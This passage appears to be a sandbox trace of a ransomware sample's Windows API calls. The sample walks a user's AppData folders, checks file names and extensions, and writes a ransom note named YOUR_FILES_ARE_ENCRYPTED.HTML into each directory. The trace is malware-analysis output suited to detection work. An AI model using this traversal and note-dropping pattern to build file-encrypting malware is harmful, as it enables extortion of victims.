lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0164.773] CloseHandle (hObject=0x598) returned 1 [0164.773] GetProcessHeap () returned 0x270000 [0164.774] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.774] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd2dae310, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2dae310, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd2dae310, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 0 [0164.774] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0164.774] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 67 [0164.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a4 [0164.775] WriteFile (in: hFile=0x5a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0164.778] CloseHandle (hObject=0x5a4) returned 1 [0164.778] GetProcessHeap () returned 0x270000 [0164.779] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0164.779] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x5db57a50, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x5db57a50, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0164.779] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow") returned 40 [0164.779] GetProcessHeap () returned 0x270000 [0164.779] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0164.779] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow" [0164.779] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\*" [0164.779] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x5db57a50, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x5db57a50, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0164.780] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x5db57a50, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x5db57a50, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0164.780] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xaee77c00, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaee77c00, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0164.780] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft") returned 50 [0164.780] GetProcessHeap () returned 0x270000 [0164.780] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0164.780] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft" [0164.780] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\*" [0164.780] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xaee77c00, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaee77c00, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0164.780] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xaee77c00, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaee77c00, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0164.780] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x5db57a50, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x5db57a50, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0164.780] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache") returned 67 [0164.780] GetProcessHeap () returned 0x270000 [0164.780] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0164.781] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache" [0164.781] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*" [0164.781] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x5db57a50, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x5db57a50, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0164.782] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x5db57a50, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x5db57a50, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0164.782] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x25285390, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x25285390, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Content", cAlternateFileName="")) returned 1 [0164.782] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content") returned 75 [0164.782] GetProcessHeap () returned 0x270000 [0164.783] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0164.785] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content" [0164.785] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*" [0164.785] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x25285390, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x25285390, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0164.785] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x25285390, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x25285390, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0164.785] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1b2bced0, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x1b2bced0, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x1b2bced0, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x475, dwReserved0=0x0, dwReserved1=0x60, cFileName="37C951188967C8EB88D99893D9D191FE", cAlternateFileName="37C951~1")) returned 1 [0164.785] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\37C951188967C8EB88D99893D9D191FE") returned 108 [0164.785] lstrcmpW (lpString1="37C951188967C8EB88D99893D9D191FE", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.785] PathFindExtensionW (pszPath="37C951188967C8EB88D99893D9D191FE") returned="" [0164.785] lstrlenW (lpString="") returned 0 [0164.786] PathFindExtensionW (pszPath="37C951188967C8EB88D99893D9D191FE") returned="" [0164.786] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x195ba2b0, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x195ba2b0, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x195ba2b0, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x12bb, dwReserved0=0x0, dwReserved1=0x60, cFileName="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", cAlternateFileName="57C8ED~1")) returned 1 [0164.786] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned 108 [0164.786] lstrcmpW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.786] PathFindExtensionW (pszPath="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="" [0164.786] lstrlenW (lpString="") returned 0 [0164.786] PathFindExtensionW (pszPath="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="" [0164.786] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x70be18f0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x70be18f0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x70be18f0, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x30d, dwReserved0=0x0, dwReserved1=0x60, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0164.786] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned 108 [0164.786] lstrcmpW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.786] PathFindExtensionW (pszPath="696F3DE637E6DE85B458996D49D759AD") returned="" [0164.786] lstrlenW (lpString="") returned 0 [0164.786] PathFindExtensionW (pszPath="696F3DE637E6DE85B458996D49D759AD") returned="" [0164.786] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x25285390, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x25285390, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x25285390, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x234, dwReserved0=0x0, dwReserved1=0x60, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0164.786] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 108 [0164.786] lstrcmpW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.786] PathFindExtensionW (pszPath="7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0164.786] lstrlenW (lpString="") returned 0 [0164.786] PathFindExtensionW (pszPath="7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0164.786] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x17fb5730, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x17fb5730, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x17fb5730, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0xe6fe, dwReserved0=0x0, dwReserved1=0x60, cFileName="77EC63BDA74BD0D0E0426DC8F8008506", cAlternateFileName="77EC63~1")) returned 1 [0164.786] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506") returned 108 [0164.786] lstrcmpW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.786] PathFindExtensionW (pszPath="77EC63BDA74BD0D0E0426DC8F8008506") returned="" [0164.787] lstrlenW (lpString="") returned 0 [0164.787] PathFindExtensionW (pszPath="77EC63BDA74BD0D0E0426DC8F8008506") returned="" [0164.787] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x60decdd0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x60decdd0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x60decdd0, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0xe6fe, dwReserved0=0x0, dwReserved1=0x60, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0164.787] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned 108 [0164.787] lstrcmpW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.787] PathFindExtensionW (pszPath="94308059B57B3142E455B38A6EB92015") returned="" [0164.787] lstrlenW (lpString="") returned 0 [0164.787] PathFindExtensionW (pszPath="94308059B57B3142E455B38A6EB92015") returned="" [0164.787] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1e505f90, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x1e505f90, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x1e505f90, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x0, dwReserved1=0x60, cFileName="C0018BB1B5834735BFA60CD063B31956", cAlternateFileName="C0018B~1")) returned 1 [0164.787] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C0018BB1B5834735BFA60CD063B31956") returned 108 [0164.787] lstrcmpW (lpString1="C0018BB1B5834735BFA60CD063B31956", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.787] PathFindExtensionW (pszPath="C0018BB1B5834735BFA60CD063B31956") returned="" [0164.787] lstrlenW (lpString="") returned 0 [0164.787] PathFindExtensionW (pszPath="C0018BB1B5834735BFA60CD063B31956") returned="" [0164.787] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x5db57a50, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x5db57a50, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x5f1, dwReserved0=0x0, dwReserved1=0x60, cFileName="E34E75954A05FA2156EB895949C74728", cAlternateFileName="E34E75~1")) returned 1 [0164.787] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\E34E75954A05FA2156EB895949C74728") returned 108 [0164.787] lstrcmpW (lpString1="E34E75954A05FA2156EB895949C74728", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.787] PathFindExtensionW (pszPath="E34E75954A05FA2156EB895949C74728") returned="" [0164.787] lstrlenW (lpString="") returned 0 [0164.787] PathFindExtensionW (pszPath="E34E75954A05FA2156EB895949C74728") returned="" [0164.787] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x67421e70, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x67421e70, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x67421e70, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x5f1, dwReserved0=0x0, dwReserved1=0x60, cFileName="F0ACCF77CDCBFF39F6191887F6D2D357", cAlternateFileName="F0ACCF~1")) returned 1 [0164.787] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F0ACCF77CDCBFF39F6191887F6D2D357") returned 108 [0164.787] lstrcmpW (lpString1="F0ACCF77CDCBFF39F6191887F6D2D357", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.788] PathFindExtensionW (pszPath="F0ACCF77CDCBFF39F6191887F6D2D357") returned="" [0164.788] lstrlenW (lpString="") returned 0 [0164.788] PathFindExtensionW (pszPath="F0ACCF77CDCBFF39F6191887F6D2D357") returned="" [0164.788] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x73e04850, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x73e04850, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x73e04850, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x226, dwReserved0=0x0, dwReserved1=0x60, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0164.788] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 108 [0164.788] lstrcmpW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.788] PathFindExtensionW (pszPath="F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0164.788] lstrlenW (lpString="") returned 0 [0164.788] PathFindExtensionW (pszPath="F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0164.788] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x73e04850, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x73e04850, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x73e04850, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x226, dwReserved0=0x0, dwReserved1=0x60, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0164.788] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0164.788] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0164.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 